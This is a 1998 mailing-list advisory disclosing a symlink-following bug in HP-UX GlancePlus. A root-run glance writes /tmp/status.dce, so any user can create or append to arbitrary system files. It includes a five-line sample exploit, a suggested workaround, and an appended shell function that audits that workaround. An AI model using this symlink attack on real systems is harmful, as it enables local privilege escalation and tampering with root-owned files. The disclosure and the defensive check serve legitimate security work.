HP-UX glance bug (#4?)

From: J.A. Gutierrez (spdat_private)
Date: Mon Apr 27 1998 - 14:31:12 PDT

        * Software:
    
        HP-UX B.10.20 D
        Glance.Runtime.GLANCE                 B.10.20.95     HP GlancePlus files
    
        * Bug:
    
        glance creates a /tmp/status.dce file as root, and it follows
        symlinks, so you can append text like
    
    Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
    Performance Management Application registered.
    --------------------------------------------------------------------------
    
        to any system file.
    
        * Sample exploit:
    
        $ umask 000
        $ cd /tmp
        $ ln -s /.test status.dce
        $ glance -j 1 -iterations 1 -maxpages 1
        $ ls -l /.test
        -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test
    
        # edit /.test to match your needs
    
        * Workaround:
    
        I guess creating a non-writable /tmp/status.dce file
        and setting the t bit on /tmp (which it seems it has
        not in the default HP-UX installation) would be enough
    
        * Note: I've been looking for HP-UX bugs, and I have found
        several reported holes in glance; but it seems this one
        is new...
    
    --
        J.A. Gutierrez                                   So be easy and free
                                                when you're drinking with me
                                          I'm a man you don't meet every day
     finger me for PGP                                          (the pogues)
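
The workaround described in the message, written as a check an administrator can run (an added example, not part of the original post). The function name and its optional file-name and owner-uid arguments are assumptions of this example; by default it checks `status.dce` for ownership by uid 0.

```shell
# Added example: audits the two conditions named in the workaround.
# Usage: check_status_file /tmp     (expects the file to be owned by uid 0)
# The optional 2nd/3rd arguments (file name, expected owner uid) exist only
# so the check can be exercised in a scratch directory.
check_status_file() {
    dir=$1
    name=${2:-status.dce}
    want_uid=${3:-0}
    path=$dir/$name
    rc=0

    # Without the sticky (t) bit, any user with write access to the directory
    # can remove the placeholder file and put a symlink in its place.
    if [ ! -k "$dir" ]; then
        echo "FAIL: $dir has no sticky bit"
        rc=1
    fi

    if [ -h "$path" ]; then
        # The condition the post describes: a root process would follow this.
        echo "FAIL: $path is a symlink"
        rc=1
    elif [ ! -f "$path" ]; then
        echo "FAIL: $path is not a pre-created regular file"
        rc=1
    else
        info=$(ls -ldn "$path")
        mode=$(echo "$info" | awk '{print $1}')
        uid=$(echo "$info" | awk '{print $3}')
        if [ "$uid" != "$want_uid" ]; then
            echo "FAIL: $path is owned by uid $uid, expected $want_uid"
            rc=1
        fi
        # Character 6 of the mode string is group write, character 9 other write.
        case $mode in
            ?????w*|????????w*)
                echo "FAIL: $path is group- or world-writable ($mode)"
                rc=1 ;;
        esac
    fi

    [ "$rc" -eq 0 ] && echo "OK: $path is a placeholder in a sticky directory"
    return "$rc"
}
```
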
    


